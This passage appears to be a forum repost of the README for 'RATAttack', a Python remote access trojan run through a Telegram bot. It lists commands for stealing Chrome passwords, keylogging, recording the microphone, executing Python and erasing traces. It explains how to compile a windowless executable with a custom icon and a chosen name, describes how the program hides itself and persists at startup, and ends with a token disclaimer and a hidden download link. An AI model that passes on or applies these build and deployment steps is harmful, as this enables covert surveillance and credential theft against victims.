Chrome's login/passwords hear - record microphone ip_info - via ipinfo.io keylogs - get keylogs ls - list contents of current or specified directory msg_box - display message box with text mv - move files pc_info - PC information ping - makes sure target is up play - plays a youtube video proxy - opens a proxy server pwd - show current directory python_exec - interpret python reboot - reboot computer run - run a file schedule - schedule a command to run at specific time self_destruct - destroy all traces shutdown - shutdown computer tasklist - display services and processes running to - select targets by it's name update - update executable wallpaper - change wallpaper You can copy the above to update your command list via BotFather so you don't have to type them manually. Compiling: How To Compile: Either: Replace your path in compileAndRun.bat (running this will actually run the executable) Or: Run `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`. You can also pass `--icon=<path\to\icon.ico>` to use any custom icon. Once it is compiled successfully, find the .exe file in C:\Python27\Scripts\dist\. You can change the name of the .exeto anything you wish. BEWARE! If you run the compiled .exe, the script will hide itself and infect your PC to run at startup. You can return to normal by using the /self_destruct option or manually removing C:\Users\Username\AppData\Roaming\Portal directory and C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk (although I recommend removing them manually for the time being). Modifying Settings: You can also modify the name of hidden .exe file and location & name of the folder where the hidden .exe will hide itself. To do this; modify compiled_name and hide_folder respectively. Assign your known chat ids to beginning of RATAttack.py Notes: Currently only Python2 is supported. Python3 support will be added soon! Contributing: This project is still in very early stages, so you can expect some bugs. Please feel free to report them! Even better, send a pull request :) Any new features and ideas are most welcome! Please do submit feature requests by creating Issues Disclaimer: This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal. License: The MIT License Download: [HIDE][Hidden Content]]